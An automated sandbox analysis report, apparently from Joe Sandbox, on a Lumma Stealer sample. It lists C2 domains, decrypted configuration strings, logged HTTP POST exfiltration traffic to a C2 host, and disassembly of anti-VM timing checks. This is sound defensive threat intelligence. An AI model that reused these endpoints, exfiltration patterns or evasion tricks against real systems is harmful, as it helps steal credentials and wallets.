

Windows Analysis Report
onaUtwpiyq.exe

Overview

General Information

Sample name: onaUtwpiyq.exe (renamed because original name is a hash value)
Original sample name: 7c96eee8e62caedad10358116f0b8024.exe
Analysis ID: 1581242
MD5: 7c96eee8e62caedad10358116f0b8024
SHA1: 1816e4f69b7bf7e9b8a2a04ab5d0694896284357
SHA256: ca2141db806dcfd4769d08d2bfa07449353fb1137d1aa3664f9afbd8e506d7b1
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • onaUtwpiyq.exe (PID: 3784 cmdline: "C:\Users\user\Desktop\onaUtwpiyq.exe" MD5: 7C96EEE8E62CAEDAD10358116F0B8024)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rebuildeso.buzz", "inherineau.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "mindhandru.buzz", "hummskitnj.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1482497732.00000000007E8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1482232390.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: onaUtwpiyq.exe PID: 3784 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: onaUtwpiyq.exe PID: 3784 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: onaUtwpiyq.exe PID: 3784 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T09:01:54.542493+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49712 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:56.513604+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49718 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:59.055245+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49724 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:01.352480+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49730 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:03.785693+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49736 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:06.688005+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49742 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:09.428663+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49749 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:12.999874+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49760 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:55.271561+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49712 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:57.379739+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49718 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:55.271561+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49712 | 104.21.11.101 | 443 | TCP
2024-12-27T09:01:57.379739+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.9 | 49718 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:07.587181+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49742 | 104.21.11.101 | 443 | TCP
2024-12-27T09:02:09.432641+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.9 | 49749 | 104.21.11.101 | 443 | TCP


                AV Detection

Source: onaUtwpiyq.exe | Avira: detected
Source: https://mindhandru.buzz/CCf | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/L | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/CD | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/rs | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/Y | Avira URL Cloud: Label: malware
Source: onaUtwpiyq.exe.3784.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "inherineau.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "mindhandru.buzz", "hummskitnj.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
Source: onaUtwpiyq.exe | Virustotal: Detection: 67%
Source: onaUtwpiyq.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: onaUtwpiyq.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1356716205.0000000004880000.00000004.00001000.00020000.00000000.sdmp | String decryptor (decrypted strings):
  • hummskitnj.buzz
  • cashfuzysao.buzz
  • appliacnesot.buzz
  • screwamusresz.buzz
  • inherineau.buzz
  • scentniej.buzz
  • rebuildeso.buzz
  • prisonyfork.buzz
  • mindhandru.buzz
  • lid=%s&j=%s&ver=4.0
  • TeslaBrowser/5.5
  • - Screen Resoluton:
  • - Physical Installed Memory:
  • Workgroup: -
  • PsFKDg--pablo
Source: onaUtwpiyq.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9 (client ports 49712, 49718, 49724, 49730, 49736, 49742, 49749) version: TLS 1.2

                Networking

Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49742 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49718 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49718 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49712 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49712 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49749 -> 104.21.11.101:443
Source: Malware configuration extractor | URLs: rebuildeso.buzz, inherineau.buzz, appliacnesot.buzz, prisonyfork.buzz, cashfuzysao.buzz, screwamusresz.buzz, mindhandru.buzz, hummskitnj.buzz, scentniej.buzz
Source: Joe Sandbox View | IP Address: 104.21.11.101
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9 -> 104.21.11.101:443 (client ports 49712, 49718, 49724, 49730, 49736, 49742, 49749, 49760)
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=DYUBSUUYZEJ58FRNYT | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12845 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=29GKX58PQGN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15021 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=Q5ZLR9WWZ7ZJ9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20549 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=F5ZQ1AADALN0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1183 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=GLB0WX83D | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 584814 | Host: mindhandru.buzz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mindhandru.buzz
Source: unknown | Network traffic detected: HTTP traffic on port 443 to and from client ports 49712, 49718, 49724, 49730, 49736, 49742, 49749, 49760
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49749 version: TLS 1.2

                System Summary

                Source: onaUtwpiyq.exe | Static PE information: section name:
                Source: onaUtwpiyq.exe | Static PE information: section name: .idata
                Source: onaUtwpiyq.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Code function: 0_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Code function: 0_3_007FC74F
                Source: onaUtwpiyq.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: onaUtwpiyq.exe | Static PE information: Section: ZLIB complexity 0.9996680964052288
                Source: onaUtwpiyq.exe | Static PE information: Section: asctzxyj ZLIB complexity 0.994520759467411
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: onaUtwpiyq.exe, 00000000.00000003.1406953910.000000000534C000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406446946.0000000005368000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: onaUtwpiyq.exe | Virustotal: Detection: 67%
                Source: onaUtwpiyq.exe | ReversingLabs: Detection: 60%
                Source: onaUtwpiyq.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | File read: C:\Users\user\Desktop\onaUtwpiyq.exe
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Section loaded: version.dll
                Source: onaUtwpiyq.exe | Static file information: File size 1869312 > 1048576
                Source: onaUtwpiyq.exe | Static PE information: Raw size of asctzxyj is bigger than: 0x100000 < 0x19e400

                Data Obfuscation

                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Unpacked PE file: 0.2.onaUtwpiyq.exe.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;asctzxyj:EW;cphljqds:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;asctzxyj:EW;cphljqds:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: onaUtwpiyq.exe | Static PE information: real checksum: 0x1cbbde should be: 0x1ce0d3
                Source: onaUtwpiyq.exe | Static PE information: section name:
                Source: onaUtwpiyq.exe | Static PE information: section name: .idata
                Source: onaUtwpiyq.exe | Static PE information: section name:
                Source: onaUtwpiyq.exe | Static PE information: section name: asctzxyj
                Source: onaUtwpiyq.exe | Static PE information: section name: cphljqds
                Source: onaUtwpiyq.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Code function: 0_3_007E3E5A push edi; retf 0_3_007E3EE9
                Source: onaUtwpiyq.exe | Static PE information: section name: entropy: 7.984613246074543
                Source: onaUtwpiyq.exe | Static PE information: section name: asctzxyj entropy: 7.953040311099013

                Boot Survival

                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD4B84 second address: AD4BA5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF3D0D81736h 0x00000008 jmp 00007FF3D0D81742h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD3BCE second address: AD3BD7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD3BD7 second address: AD3BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD7CFB second address: AD7D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FF3D0F68BBAh 0x0000000b jmp 00007FF3D0F68BB4h 0x00000010 popad 0x00000011 push eax 0x00000012 jl 00007FF3D0F68BAEh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD7D25 second address: AD7D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD7D33 second address: AD7D58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FF3D0F68BACh 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD7F30 second address: AD7F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD7F34 second address: AD7F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD7F38 second address: AD7F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD7F3E second address: AD7F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FF3D0F68BAEh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FF3D0F68BAAh 0x0000001a pop eax 0x0000001b mov dword ptr [ebp+122D26F7h], ecx 0x00000021 lea ebx, dword ptr [ebp+12452C35h] 0x00000027 push eax 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b ja 00007FF3D0F68BA6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD806F second address: AD8092 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 4BBAB99Ah 0x0000000e add edi, dword ptr [ebp+122D377Fh] 0x00000014 lea ebx, dword ptr [ebp+12452C3Eh] 0x0000001a and dh, FFFFFFF9h 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD8155 second address: AD8164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0F68BAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AD8164 second address: AD81D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 44CCE901h 0x0000000e ja 00007FF3D0D81742h 0x00000014 jmp 00007FF3D0D8173Ch 0x00000019 push 00000003h 0x0000001b movzx ecx, bx 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D1809h], ecx 0x00000026 push 00000003h 0x00000028 js 00007FF3D0D81738h 0x0000002e mov edi, ebx 0x00000030 push 6C2A7D8Ch 0x00000035 jmp 00007FF3D0D81740h 0x0000003a add dword ptr [esp], 53D58274h 0x00000041 adc ch, 0000007Ch 0x00000044 lea ebx, dword ptr [ebp+12452C49h] 0x0000004a pushad 0x0000004b mov ecx, dword ptr [ebp+122D38EFh] 0x00000051 or dword ptr [ebp+122D26F7h], edx 0x00000057 popad 0x00000058 push eax 0x00000059 pushad 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AE8CCE second address: AE8CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0F68BADh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AE8CDF second address: AE8CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AE8CE3 second address: AE8CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: ACE19B second address: ACE1B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FF3D0D81736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007FF3D0D81736h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: ACE1B1 second address: ACE1BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: ACE1BD second address: ACE1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D81740h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF4FC0 second address: AF4FC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF4FC4 second address: AF4FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF5417 second address: AF542F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0F68BB3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF542F second address: AF544F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D81745h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
